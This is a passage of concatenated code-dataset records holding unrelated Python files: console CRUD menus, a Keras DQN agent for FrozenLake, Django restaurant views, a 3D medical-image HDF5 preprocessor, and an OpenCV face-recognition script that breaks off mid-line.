print(f'No existe un {tipo_persona} con esa cédula')\r\n continue\r\n return d_p[0]\r\n\r\n##id, titulo, fecha_estreno, director_id, genero, actor_id\r\ndef crear_pelicula():\r\n print('INGRESO DE DATOS')\r\n titulo = input('Nombre Película:').upper()\r\n fecha_estreno = valida_fecha('Fecha Estreno')\r\n director_id = valida_persona_peli('Director')\r\n genero = valida_estilo_peli()\r\n actor_id = valida_persona_peli('Actor')\r\n pelicula = Pelicula(None, titulo, fecha_estreno, director_id, genero, actor_id)\r\n pelicula.inserta_pelicula()\r\n\r\n\r\ndef opcion_menu(titulo, ms):\r\n while True:\r\n while True:\r\n print(f'** OPCIÓN {titulo.upper()} **')\r\n print(f'1. Crear {titulo}')\r\n print(f'2. Modificar {titulo}')\r\n print(f'3. Eliminar {titulo}')\r\n print(f'4. {titulo} consultar Todos')\r\n print(f'5. {titulo} consultar uno')\r\n print(f'6. Regresar al menú principal')\r\n try:\r\n opc = int(input(f'Seleccione una opción del menú {titulo} (1-6):'))\r\n if 1 <= opc <= 6: # AND\r\n break\r\n except:\r\n print('Por favor, seleccione una opción correcta (1-6)...!')\r\n\r\n if opc == 6:\r\n main_menu()\r\n elif ms == 1:\r\n if opc == 1:\r\n crear_persona()\r\n elif opc == 2:\r\n modificar_persona()\r\n elif opc == 3:\r\n eliminar_persona()\r\n elif opc == 4:\r\n Persona.lista_personas()\r\n else:\r\n consulta_una_persona()\r\n elif ms == 2:\r\n if opc == 1:\r\n crear_director()\r\n elif opc == 2:\r\n modificar_director()\r\n elif opc == 3:\r\n eliminar_director()\r\n elif opc == 4:\r\n Director.lista_directores()\r\n else:\r\n consulta_un_director()\r\n elif ms == 3:\r\n if opc == 1:\r\n crear_actor()\r\n elif opc == 2:\r\n modificar_actor()\r\n elif opc == 3:\r\n eliminar_actor()\r\n elif opc == 4:\r\n Actor.lista_actores()\r\n else:\r\n consulta_un_actor()\r\n elif ms == 4:\r\n if opc == 1:\r\n crear_pelicula()\r\n elif opc == 2:\r\n pass # proceso de modificar pelicula\r\n elif opc == 3:\r\n pass # proceso de eliminar pelicula\r\n elif opc == 4:\r\n Pelicula.lista_peliculas()\r\n else:\r\n pass # proceso de consul. una pelicula\r\n\r\n\r\ndef main_menu():\r\n while True:\r\n print('** MENÚ DEL SISTEMA **')\r\n print('1. Persona') # insertar, modificar, eliminar, consultar todos, consultar uno\r\n print('2. Director') # insertar, modificar, eliminar, consultar todos, consultar uno\r\n print('3. Actor') # insertar, modificar, eliminar, consultar todos, consultar uno\r\n print('4. Películas') # insertar, modificar, eliminar, consultar todos, consultar uno\r\n print('5. Salir')\r\n try:\r\n opc = int(input('Seleccione una opción del menú (1-5):'))\r\n if 1 <= opc <= 5: # AND\r\n break\r\n except:\r\n print('Por favor, seleccione una opción correcta (1-5)...!')\r\n\r\n if opc == 1:\r\n opcion_menu('Persona', opc)\r\n elif opc == 2:\r\n opcion_menu('Director', opc)\r\n elif opc == 3:\r\n opcion_menu('Actor', opc)\r\n elif opc == 4:\r\n opcion_menu('Películas', opc)\r\n else:\r\n print('Cerrar sesión...!', opc)\r\n exit()\r\n","repo_name":"farevaloc/python_poo","sub_path":"funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":13216,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21552742027","text":"#用来存储名片的列表\ncard_infors = []\n\n\n\ndef print_menu():\n #1. 打印功能提示\n print(\"=\"*50)\n print(\" 名片管理系统\")\n print(\"1. 增加一个新名片\")\n print(\"2. 删除一个名称\")\n print(\"3. 修改一个名片\")\n print(\"4. 查询一个名片\")\n print(\"5. 显示所有名片\")\n print(\"6. 退出系统\")\n print(\"=\"*50)\n\n\ndef add_new_card_infor():\n \"\"\"完成文档输入:\"\"\"\n new_name = input(\"请输入新的名字:\")\n new_qq = input(\"请输入新的QQ:\")\n new_weixin = input(\"请输入新的微信:\")\n new_addr = input(\"请输入地址:\")\n\n # 定义一个新的字典,用来存储新的名片\n new_infor = {}\n new_infor['name'] = new_name\n new_infor['qq'] = new_qq\n new_infor[\"weixin\"] = new_weixin\n new_infor['addr'] = new_addr\n global card_infors\n card_infors.append(new_infor)\n\n\ndef find_card_infor():\n find_name = input(\"请输入要查找的姓名:\")\n\n find_flag = 0 # 默认没有找到\n\n global card_infors\n for temp in card_infors:\n if find_name == temp[\"name\"]:\n print(\"%s\\t%s\\t%s\\t%s\"%(temp['name'],temp['qq'],temp['weixin'],temp['addr']))\n find_flag=1\n break\n if find_flag == 0:\n print(\"查无此人\")\n\ndef show_all_infor():\n \"\"\"显示所有信息\"\"\"\n print(\"姓名\\tQQ\\t微信\\t住址\")\n global card_infors\n for temp in card_infors:\n # print(temp)\n print(\"%s\\t%s\\t%s\\t%s\"%(temp['name'],temp['qq'],temp['weixin'],temp['addr']))\n\n\ndef del_card_infor():\n del_name = input(\"请输入要查找的姓名:\")\n find_flag = 0 # 默认没找到\n\n global card_infors\n for temp in card_infors:\n if del_name == temp[\"name\"]:\n card_infors.remove(temp)\n find_flag = 1\n show_all_infor()\n break\n if find_flag == 0:\n print(\"查无此人\")\n\n\ndef del_modify_infor():\n modify_name = input(\"请输入要修改信息的名称:\")\n find_flag = 0\n\n global card_infors\n for temp in card_infors:\n if modify_name == temp[\"name\"]:\n modify_content = input(\"请输入要修改的信息,如name,qq,weixin,addr等:\")\n for name in temp.keys():\n print(\"+\"*50)\n print(temp.keys())\n print(\"+\"*50)\n print(name)\n if modify_content == name:\n modify_value = input(\"请输入要修改的值:\")\n temp[name] = modify_value\n show_all_infor()\n find_flag = 1\n break\n\n if find_flag == 0:\n print(\"查无此人\")\n\n\n\n\ndef main():\n \"\"\"完成对整个程序得控制\"\"\"\n\n print_menu()\n while True:\n #2. 获取用户的输入\n num = int(input(\"请输入操作序号:\"))\n\n #3. 根据用户的数据执行相应的功能:\n if num == 1:\n add_new_card_infor()\n elif num == 2:\n del_card_infor()\n elif num == 3:\n del_modify_infor()\n elif num == 4:\n find_card_infor()\n elif num == 5:\n show_all_infor()\n elif num == 6:\n break\n else:\n print(\"输入有误,请重新输入:\")\n\n\n\n# 调用主函数\nmain()","repo_name":"nailao946/Python","sub_path":"from web/同学录.py","file_name":"同学录.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36706084929","text":"import random\nimport time as tm\nfrom collections import deque\n\nimport numpy as np\nfrom keras import Model\nfrom keras.layers import Dense\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\nfrom keras.utils import to_categorical\n\nfrom env.FrozenLakeMDP import frozenLake\n\n\nclass DQNAgent:\n def __init__(self, action_size, learning_rate, model: Model, get_legal_actions):\n self.action_size = action_size\n self.memory = deque(maxlen=2000)\n self.gamma = 0.95 # discount rate\n self.epsilon = 1.0 # exploration rate\n self.epsilon_min = 0.01\n self.epsilon_decay = 0.999\n self.learning_rate = learning_rate\n self.model = model\n self.get_legal_actions = get_legal_actions\n\n def remember(self, state, action, reward, next_state, done):\n # Function adds information to the memory about last action and its results\n self.memory.append((state, action, reward, next_state, done))\n\n def get_action(self, state):\n \"\"\"\n Compute the action to take in the current state, including exploration.\n With probability self.epsilon, we should take a random action.\n otherwise - the best policy action (self.get_best_action).\n\n Note: To pick randomly from a list, use random.choice(list).\n To pick True or False with a given probablity, generate uniform number in [0, 1]\n and compare it with your probability\n \"\"\"\n\n #\n # INSERT CODE HERE to get action in a given state (according to epsilon greedy algorithm)\n #\n\n # Pick Action\n possible_actions = self.get_legal_actions(state)\n\n # If there are no legal actions, return None\n if len(possible_actions) == 0:\n return None\n\n epsilon = self.epsilon\n\n #\n # INSERT CODE HERE to get action in a given state (according to epsilon greedy algorithm)\n #\n\n best_action = self.get_best_action(state)\n chosen_action = best_action\n\n if random.uniform(0, 1) < epsilon:\n random_actions = possible_actions.copy()\n random_actions.remove(best_action)\n chosen_action = random.choice(random_actions if random_actions else [best_action])\n\n return chosen_action\n\n def get_best_action(self, state):\n \"\"\"\n Compute the best action to take in a state (using current q-values).\n \"\"\"\n possible_actions = self.get_legal_actions(state)\n\n # If there are no legal actions, return None\n if len(possible_actions) == 0:\n return None\n\n return np.argmax(self.model.predict(state))\n\n def lower_epsilon(self):\n new_epsilon = self.epsilon * self.epsilon_decay\n if new_epsilon >= self.epsilon_min:\n self.epsilon = new_epsilon\n\n def replay(self, batch_size):\n \"\"\"\n Function learn network using randomly selected actions from the memory.\n First calculates Q value for the next state and choose action with the biggest value.\n Target value is calculated according to:\n Q(s,a) := (r + gamma * max_a(Q(s', a)))\n except the situation when the next action is the last action, in such case Q(s, a) := r.\n In order to change only those weights responsible for chosing given action, the rest values should be those\n returned by the network for state state.\n The network should be trained on batch_size samples.\n Also every time the function replay is called self.epsilon value should be updated according to equation:\n self.epsilon *= self.epsilon_decay\n \"\"\"\n #\n # INSERT CODE HERE to train network\n #\n\n if len(self.memory) < batch_size:\n return\n\n info_sets = random.sample(self.memory, batch_size)\n states_list = []\n targets_list = []\n for info_set in info_sets:\n state, action, reward, next_state, done = info_set\n states_list.append(state.flatten())\n target = self.model.predict(state)\n if done:\n target[0][action] = reward\n else:\n Q_future = max(self.model.predict(next_state)[0])\n target[0][action] = reward + Q_future * self.gamma\n targets_list.append(target.flatten())\n\n states_array = np.array(states_list)\n targets_array = np.array(targets_list)\n\n self.model.train_on_batch(states_array, targets_array)\n self.lower_epsilon()\n\n\nenv = frozenLake(\"4x4\")\n\nstate_size = env.get_number_of_states()\naction_size = len(env.get_possible_actions(None))\nlearning_rate = 0.001\n\nmodel = Sequential()\nmodel.add(Dense(16, input_dim=state_size, activation=\"relu\"))\nmodel.add(Dense(32, activation=\"relu\"))\nmodel.add(Dense(16, activation=\"relu\"))\nmodel.add(Dense(action_size)) # wyjście\nmodel.compile(loss=\"mean_squared_error\",\n optimizer=Adam(lr=learning_rate))\n\nagent = DQNAgent(action_size, learning_rate, model, get_legal_actions=env.get_possible_actions)\n\ndone = False\nbatch_size = 64\nEPISODES = 1000\ncounter = 0\n\nfor e in range(EPISODES):\n start = tm.time()\n summary = []\n for _ in range(100):\n total_reward = 0\n env_state = env.reset()\n\n #\n # INSERT CODE HERE to prepare appropriate format of the state for network\n #\n state = np.array([to_categorical(env_state, num_classes=state_size)])\n\n for time in range(500):\n action = agent.get_action(state)\n next_state_env, reward, done, _ = env.step(action)\n total_reward += reward\n\n #\n # INSERT CODE HERE to prepare appropriate format of the next state for network\n #\n next_state = np.array([to_categorical(next_state_env, num_classes=state_size)])\n\n # add to experience memory\n agent.remember(state, action, reward, next_state, done)\n state = next_state\n if done:\n break\n\n #\n # INSERT CODE HERE to train network if in the memory is more samples then size of the batch\n #\n if len(agent.memory) > batch_size:\n agent.replay(64)\n\n summary.append(total_reward)\n\n end = tm.time()\n print(\"epoch #{}\\tmean reward = {:.3f}\\tepsilon = {:.3f}\\ttime = {}\".format(e, np.mean(summary), agent.epsilon,\n end - start))\n if np.mean(total_reward) > 0.9:\n print(\"You Win!\")\n break\n","repo_name":"Anamitr/ISI-lab","sub_path":"deep_q_learning.py","file_name":"deep_q_learning.py","file_ext":"py","file_size_in_byte":6549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70080483769","text":"#preferência por listas compostas\r\n\r\nmatriz = [[],[],[]]\r\nsoma_pares = soma_terceira = 0\r\nfor x in range(3):\r\n for y in range(3):\r\n valor = int(input(f'Digite um valor para a posição [{x,y}]: '))\r\n matriz[x].append(valor)\r\n if valor % 2 == 0:\r\n soma_pares += valor\r\n if y == 2:\r\n soma_terceira += valor\r\nprint('=-'*30)\r\nfor x in range(3):\r\n for y in range(3):\r\n print(f'[{matriz[x][y]:^5}]', end = ' ')\r\n print()\r\n\r\nprint('=-'*30)\r\nprint(f'A soma dos valores pares: {soma_pares}\\n'\r\n f'A soma dos valores da terceira coluna: {soma_terceira}\\n'\r\n f'O maior valor da segunda linha: {max(matriz[1])}')\r\n\r\n","repo_name":"jdonghia/python-exercises","sub_path":"ex087.py","file_name":"ex087.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30620282800","text":"import numpy as np\nimport argparse\nimport cv2\nfrom pose_estimation.pose_estimation import img_inference\nfrom detection.ssd_final.inference import Detector\nfrom detection.ssd_final.ssd import build_ssd\nimport os\nimport pickle\nfrom config import *\n\n\ndef main():\n ap = argparse.ArgumentParser()\n ap.add_argument(\"--rf_weights\", help=\"path to classifier\", default= CLASSIFIER_WEIGHTS)\n ap.add_argument(\"--ssd_weights\", help=\"path to ssd weights\", default= SSD_WEIGHTS)\n ap.add_argument(\"--input\", help=\"path to video\")\n ap.add_argument(\"--output\", help=\"path to output\", default=\"results/\")\n args = vars(ap.parse_args())\n \n ssd = build_ssd('test', 300, 21) # initialize SSD\n ssd.load_weights(args[\"ssd_weights\"])\n detector = Detector(ssd)\n vid = cv2.VideoCapture(args[\"input\"])\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('output.avi',fourcc, 20.0, (640,480))\n frame_count = {}\n ped_features = {}\n with open(args[\"rf_weights\"], 'rb') as f:\n classifier = pickle.load(f)\n print(\"All Models Loaded\")\n counter = 0\n while True:\n ret, frame = vid.read()\n print(\"Frame {}\".format(counter))\n if ret:\n bboxes = detector.get_bbs(frame)\n print(bboxes)\n print(\"Found {} people\".format(len(bboxes)))\n for i, bbox in enumerate(bboxes):\n frame, features = img_inference(frame, bbox)\n cv2.imwrite(\"blah.jpg\", frame)\n return\n frame_count[\"pedestrian\" + str(i)] = 1 + frame_count.get(\"pedestrian\" + str(i), 0)\n if \"pedestrian\" + str(i) in ped_features:\n if len(ped_features[\"pedestrian\" + str(i)] >= 5544):\n if classifier.predict(ped_features[\"pedestrian\" + str(i)]):\n frame = cv2.putText(frame, \"C\", (bbox[0], bbox[1]), \"FONT_HERSHEY_PLAIN\", (0, 255, 0), 1)\n else:\n frame = cv2.putText(frame, \"NC\", (bbox[0], bbox[1]), \"FONT_HERSHEY_PLAIN\", (0, 0, 255), 1)\n past_frames = frame_count[\"pedestrian\" + str(i)] - 14\n ped_features[\"pedestrian\" + str(i)] = np.append(ped_features[\"pedestrian\" + str(i)][396*past_frames: ], features)\n else: \n ped_features[\"pedestrian\" + str(i)] = np.append(ped_features[\"pedestrian\" + str(i)], features)\n else:\n ped_features[\"pedestrian\" + str(i)] = features\n frame = cv2.rectangle(np.array(frame), (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), 255, 1)\n cv2.imwrite(args[\"output\"] + \"frame\" + str(counter) + \".jpg\", frame)\n else:\n break\n vid.release()\n out.release()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"niviruwijayaratne/pedestrian-intent-estimation","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23188703124","text":"# https://docs.ray.io/en/latest/rllib/index.html\n# This is example from page: https://www.youtube.com/watch?v=HteW2lfwLXM\n# Ray RLlib: How to Use Deep RL Algorithms to Solve Reinforcement Learning Problems, Dibya Chakravorty\n\n\nimport ray\nfrom ray import tune\n\nif __name__ == \"__main__\":\n ray.init()\n analysis=tune.run(\"PPO\",\n # https://docs.ray.io/en/latest/rllib/rllib-training.html#advanced-python-apis\n config={\"env\":\"CartPole-v1\",\n #\"evaluation_interval\":2, # number of training iterations between evaluation\n \"framework\": \"tf2\",\n \"seed\": None,\n \"num_gpus\": 0,\n \"num_workers\": 4,\n \"evaluation_num_workers\": 0,\n \"gamma\": tune.grid_search([0.9, 0.95, 0.99]),\n #\"gamma\": 0.99,\n #\"lr\": tune.grid_search([0.01, 0.001, 0.0001]),\n #\"evaluation_num_episodes\": 100,\n #\"log_level\": \"WARN\" #\n # other configuration parameters\n })\n\n\n\n\"\"\"\n# Import the RL algorithm (Algorithm) we would like to use.\nfrom ray.rllib.algorithms.ppo import PPO\n\n# Configure the algorithm.\nconfig = {\n # Environment (RLlib understands openAI gym registered strings).\n \"env\": \"CartPole-v1\",\n # Use 2 environment workers (aka \"rollout workers\") that parallelly\n # collect samples from their own environment clone(s).\n \"num_workers\": 2,\n # Change this to \"framework: torch\", if you are using PyTorch.\n # Also, use \"framework: tf2\" for tf2.x eager execution.\n \"framework\": \"tf\",\n # Tweak the default model provided automatically by RLlib,\n # given the environment's observation- and action spaces.\n \"model\": {\n \"fcnet_hiddens\": [64, 64],\n \"fcnet_activation\": \"relu\",\n },\n # Set up a separate evaluation worker set for the\n # `algo.evaluate()` call after training (see below).\n \"evaluation_num_workers\": 1,\n # Only for evaluation runs, render the env.\n \"evaluation_config\": {\n \"render_env\": True,\n },\n}\n\n# Create our RLlib Trainer.\nalgo = PPO(config=config)\n\n# Run it for n training iterations. A training iteration includes\n# parallel sample collection by the environment workers as well as\n# loss calculation on the collected batch and a model update.\nfor _ in range(3):\n print(algo.train())\n\n# Evaluate the trained Trainer (and render each timestep to the shell's\n# output).\nalgo.evaluate()\n\"\"\"","repo_name":"PeterPirog/rllib_examples","sub_path":"02_simple_rllib.py","file_name":"02_simple_rllib.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19267624691","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom .models import *\n\n# Create your views here.\ndef index(request):\n categories = Category.objects.all()\n restaurants = Restaurant.objects.all()\n content = {'categories': categories, 'restaurants': restaurants}\n # return HttpResponse(\"index\")\n return render(request, 'shareRes/index.html', content)\n \ndef restaurantDetail(request,res_id):\n restaurant = Restaurant.objects.get(id = res_id)\n content = {'restaurant': restaurant}\n # return HttpResponse(\"restaurantDetail\")\n return render(request, 'shareRes/restaurantDetail.html', content)\n \ndef restaurantCreate(request):\n categories = Category.objects.all()\n content = {'categories': categories}\n # return HttpResponse(\"restaurantCreate\")\n return render(request, 'shareRes/restaurantCreate.html', content)\n\ndef restaurantUpdate(request,res_id):\n categories = Category.objects.all()\n restaurant = Restaurant.objects.get(id = res_id)\n content = {'categories': categories, 'restaurant': restaurant}\n return render(request, 'shareRes/restaurantUpdate.html', content)\n\ndef Delete_restaurant(request):\n res_id = request.POST['resId']\n restaurant = Restaurant.objects.get(id = res_id)\n restaurant.delete()\n return HttpResponseRedirect(reverse('index'))\n\ndef Update_restaurant(request):\n resId = request.POST['resId']\n change_category_id = request.POST['resCategory']\n change_category = Category.objects.get(id = change_category_id)\n change_name = request.POST['resTitle']\n change_link = request.POST['resLink']\n change_content = request.POST['resContent']\n change_keyword = request.POST['resLoc']\n before_restaurant = Restaurant.objects.get(id = resId)\n before_restaurant.category = change_category\n before_restaurant.restaurant_name = change_name\n before_restaurant.restaurant_link = change_link\n before_restaurant.restaurant_content = change_content\n before_restaurant.restaurant_keyword = change_keyword\n before_restaurant.save()\n return HttpResponseRedirect(reverse('resDetailPage', kwargs={'res_id':resId}))\n\ndef Create_restaurant(request):\n category_id = request.POST['resCategory']\n category = Category.objects.get(id = category_id)\n name = request.POST['resTitle']\n link = request.POST['resLink']\n content = request.POST['resContent']\n keyword = request.POST['resLoc']\n new_res = Restaurant(category = category, restaurant_name = name, restaurant_link = link, restaurant_content = content, restaurant_keyword = keyword)\n new_res.save()\n return HttpResponseRedirect(reverse('index'))\n\ndef categoryCreate(request):\n categories = Category.objects.all()\n content = {'categories': categories}\n # return HttpResponse(\"categoryCreate\")\n return render(request, 'shareRes/categoryCreate.html', content)\n\ndef Create_category(request):\n category_name = request.POST['categoryName']\n new_category = Category(category_name = category_name)\n new_category.save()\n return HttpResponseRedirect(reverse('index'))\n # return HttpResponse(\"여기서 category Create 기능을 구현할거야.\")\n\ndef Delete_category(request):\n category_id = request.POST['categoryId']\n delete_category = Category.objects.get(id = category_id)\n delete_category.delete()\n return HttpResponseRedirect(reverse('cateCreatePage'))","repo_name":"doorBW/RestaurantShare-with-Django","sub_path":"RestaurantShare/shareRes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"31097136458","text":"import os\r\nimport numpy as np\r\nimport gc\r\nimport h5py\r\nfrom skimage import transform\r\nimport random\r\nfrom tqdm import tqdm\r\nimport nibabel as nib\r\nimport argparse\r\n\r\nfrom utils import *\r\n\r\ninput_path = '../dataset/Mydataset/train'\r\nsave_path= '../dataset/Mydataset/processed'\r\n#Refference:\r\ndimension = 3#3d\r\nBUFFER_SIZE = 5\r\nsubset_size = 40\r\ndtype = np.float32\r\ninp_exts = ['']\r\nmask_exts = ['_seg']\r\ntsize = (48, 48, 48)\r\nchannel = 1\r\n\r\ndef get_mode(idx):\r\n if idx%10>=8: #train/val =4/1\r\n return 'val'\r\n else:\r\n return 'train'\r\ndef process_test_data(input_path,save_path,channels,tsize):\r\n assert len(tsize) == dimension\r\n hdf5_file = h5py.File(save_path, \"w\")\r\n file_list = {'test':[]}\r\n folders = os.listdir(input_path)\r\n #random.shuffle(a)\r\n for _,fname in enumerate(folders):\r\n file_list['test'].append(fname)\r\n num = len(file_list['test'])\r\n print(f'Test Set Size:{num}')\r\n datasets = {}\r\n for mode in file_list:\r\n set_size = len(file_list[mode])\r\n if set_size>0:\r\n datasets[f'imgs_{mode}'] = hdf5_file.create_dataset(f'imgs_{mode}',(set_size,)+tuple(tsize)+(channels,),dtype=dtype)\r\n datasets[f'offset_{mode}'] = hdf5_file.create_dataset(f'offset_{mode}',(set_size,3),dtype=dtype)\r\n datasets[f'names_{mode}'] = hdf5_file.create_dataset(f'names_{mode}',(set_size,),dtype=h5py.special_dtype(vlen=str))\r\n img_list = {'test': []}\r\n offset_list = {'test': []}\r\n name_list = {'test': []}\r\n mH,mW,mD = 0,0,0 #max img size\r\n for mode in file_list:\r\n print(f'Start processing {mode} images')\r\n write_buffer = 0\r\n count = 0\r\n for fname in tqdm(file_list[mode]):\r\n path = os.path.join(input_path,fname)# \r\n img,_,img_header = load_niis(path,fname,inp_exts)\r\n assert img.shape[-1] == channels\r\n #Analyze\r\n img,offset = crop_alldim_3d(img)#crop zero volume\r\n w,h,d = img.shape[:3]\r\n mW,mH,mD = max(mW,w),max(mH,h),max(mD,d)\r\n\r\n \r\n \r\n pixel_size = (img_header.structarr['pixdim'][1],\r\n img_header.structarr['pixdim'][2],\r\n img_header.structarr['pixdim'][3])\r\n assert pixel_size == (1.0,1.0,1.0)\r\n \r\n\r\n img = crop_or_pad_slice_to_size(img, tsize, channels)\r\n img = normalise_image(img)\r\n\r\n img_list[mode].append(img)\r\n offset_list[mode].append(offset)\r\n name_list[mode].append(fname)\r\n\r\n write_buffer += 1\r\n\r\n if write_buffer >= BUFFER_SIZE:\r\n\r\n counter_to = count + write_buffer\r\n write_to_hdf5_test(datasets, mode, img_list, offset_list, name_list, count, counter_to)\r\n release_tmp_memory([img_list, offset_list,name_list], mode)\r\n\r\n # reset stuff for next iteration\r\n count = counter_to\r\n write_buffer = 0\r\n\r\n print('Writing remaining data')\r\n counter_to = count + write_buffer\r\n\r\n if len(file_list[mode]) > 0:\r\n write_to_hdf5_test(datasets, mode, img_list, offset_list, name_list,count,counter_to)\r\n release_tmp_memory([img_list, offset_list], mode)\r\n hdf5_file.close()\r\n print(mW,mH,mD)\r\ndef process_train_data(input_path,save_path,channels,tsize):\r\n assert len(tsize) == dimension\r\n hdf5_file = h5py.File(save_path, \"w\")\r\n file_list = {'train': [], 'val': []}\r\n folders = os.listdir(input_path)\r\n #random.shuffle(a)\r\n for idx,fname in enumerate(folders):\r\n mode = get_mode(idx)\r\n file_list[mode].append(fname)\r\n file_list['trainval'] = file_list['train'][:subset_size]\r\n\r\n train_num = len(file_list['train'])\r\n val_num = len(file_list['val'])\r\n print(f'Train Set Size:{train_num}',f'Val Set Size:{val_num}')\r\n datasets = {}\r\n for mode in file_list:\r\n set_size = len(file_list[mode])\r\n if set_size>0:\r\n datasets[f'imgs_{mode}'] = hdf5_file.create_dataset(f'imgs_{mode}',(set_size,)+tuple(tsize)+(channels,),dtype=dtype)\r\n datasets[f'masks_{mode}'] = hdf5_file.create_dataset(f'masks_{mode}',(set_size,)+tuple(tsize),dtype=np.uint8)\r\n datasets[f'names_{mode}'] = hdf5_file.create_dataset(f'names_{mode}',(set_size,),dtype=h5py.special_dtype(vlen=str))\r\n img_list = {'train': [], 'val': [],'trainval':[]}\r\n mask_list = {'train': [], 'val': [],'trainval':[]}\r\n name_list = {'train': [], 'val': [],'trainval':[]}\r\n mH,mW,mD = 0,0,0 #max img size\r\n for mode in file_list:\r\n print(f'Start processing {mode} images')\r\n write_buffer = 0\r\n count = 0\r\n for fname in tqdm(file_list[mode]):\r\n path = os.path.join(input_path,fname)# \r\n img,_,img_header = load_niis(path,fname,inp_exts)\r\n assert img.shape[-1] == channels\r\n mask,_,_ = load_niis(path,fname,mask_exts)\r\n mask = mask.squeeze()\r\n #Analyze\r\n img,mask,_ = crop_alldim_3d(img,mask.copy())#crop zero volume\r\n w,h,d = img.shape[:3]\r\n mW,mH,mD = max(mW,w),max(mH,h),max(mD,d)\r\n\r\n \r\n \r\n pixel_size = (img_header.structarr['pixdim'][1],\r\n img_header.structarr['pixdim'][2],\r\n img_header.structarr['pixdim'][3])\r\n assert pixel_size == (1.0,1.0,1.0)\r\n \r\n\r\n img = crop_or_pad_slice_to_size(img, tsize, channels)\r\n mask = crop_or_pad_slice_to_size(mask, tsize)\r\n\r\n img = normalise_image(img)\r\n\r\n img_list[mode].append(img)\r\n mask_list[mode].append(mask)\r\n name_list[mode].append(fname)\r\n\r\n write_buffer += 1\r\n\r\n if write_buffer >= BUFFER_SIZE:\r\n\r\n counter_to = count + write_buffer\r\n write_to_hdf5(datasets, mode, img_list, mask_list, name_list,count, counter_to)\r\n release_tmp_memory([img_list, mask_list,name_list], mode)\r\n\r\n # reset stuff for next iteration\r\n count = counter_to\r\n write_buffer = 0\r\n\r\n print('Writing remaining data')\r\n counter_to = count + write_buffer\r\n\r\n if len(file_list[mode]) > 0:\r\n write_to_hdf5(datasets, mode, img_list, mask_list, name_list,count,counter_to)\r\n release_tmp_memory([img_list, mask_list], mode)\r\n hdf5_file.close()\r\n print(mW,mH,mD)\r\n\r\n\r\n \r\ndef load_and_process_data(input_path,save_path,channels,val,\r\n tsize=None,overwrite=False):\r\n \r\n if not(os.path.exists(save_path)):\r\n os.mkdir(save_path)\r\n if not val:\r\n data_path = os.path.join(save_path,f'data_train.hdf5')\r\n if (not os.path.exists(data_path)) or overwrite:\r\n print(\"start to process\") \r\n process_train_data(input_path,data_path,channels,tsize)\r\n else:\r\n print('already exists')\r\n else:\r\n data_path = os.path.join(save_path,f'data_test.hdf5')\r\n if (not os.path.exists(data_path)) or overwrite:\r\n print(\"start to process test\" ) \r\n process_test_data(input_path,data_path,channels,tsize)\r\n else:\r\n print('already exists')\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--pr\", type=str, default='../../dataset/Mydataset', help=\"dataset path\")\r\n parser.add_argument(\"--train\", type=str, default='train', help=\"train path\")\r\n parser.add_argument(\"--test\", type=str, default='test', help=\"val path\")\r\n parser.add_argument(\"--save\", type=str, default='processed', help=\"save path\")\r\n parser.add_argument(\"--dim\", type=int, default=3, help=\"image dimension\")\r\n parser.add_argument(\"--channel\", type=int, default=1, help=\"image dimension\")\r\n parser.add_argument(\"--val\",action='store_true',help='trainset or not')\r\n parser.add_argument(\"--overwrite\",action='store_true',help='overwrite or not')\r\n parser.add_argument(\"--tsize\", type=tuple, default=None, help=\"target size\")\r\n args = parser.parse_args()\r\n dimension = args.dim\r\n save_path = os.path.join(args.pr,args.save)\r\n input_path = os.path.join(args.pr,args.train) if not args.val else os.path.join(args.pr,args.test)\r\n tsize = args.tsize if not args.tsize is None else tsize\r\n load_and_process_data(input_path,save_path,args.channel,args.val,tsize,args.overwrite)\r\n\r\n \r\n\r\n \r\n","repo_name":"Pamikk/rev-unet","sub_path":"data/process_hdf5.py","file_name":"process_hdf5.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28899215463","text":"import cv2\nimport pickle\n\nface_classifier = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nrecognizer_lbph = cv2.face.LBPHFaceRecognizer_create()\nrecognizer_lbph.read(\"trainner.yml\")\n\nlabels = {}\nwith open('labels/face-labels.pickle', 'rb') as file:\n org_labels = pickle.load(file)\n labels = {v: k for k, v in org_labels.items()}\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n retval, frame = cap.read()\n # Face detection\n gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n cap_face = face_classifier.detectMultiScale(gray_frame, scaleFactor=1.3, minNeighbors=5)\n\n for (x, y, w, h) in cap_face:\n roi_gray = gray_frame[y:y + h, x:x + h]\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\n\n # Recognition based on trained model\n id_, confidence = recognizer_lbph.predict(roi_gray)\n confidence = int(100 * (1 - (confidence / 300)))\n if confidence > 75:\n name = labels[id_]\n cv2.putText(frame, str(name) + ' ' + str(confidence) + '%', (x, y), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 2)\n else:\n cv2.putText(frame, 'unknown', (x, y), 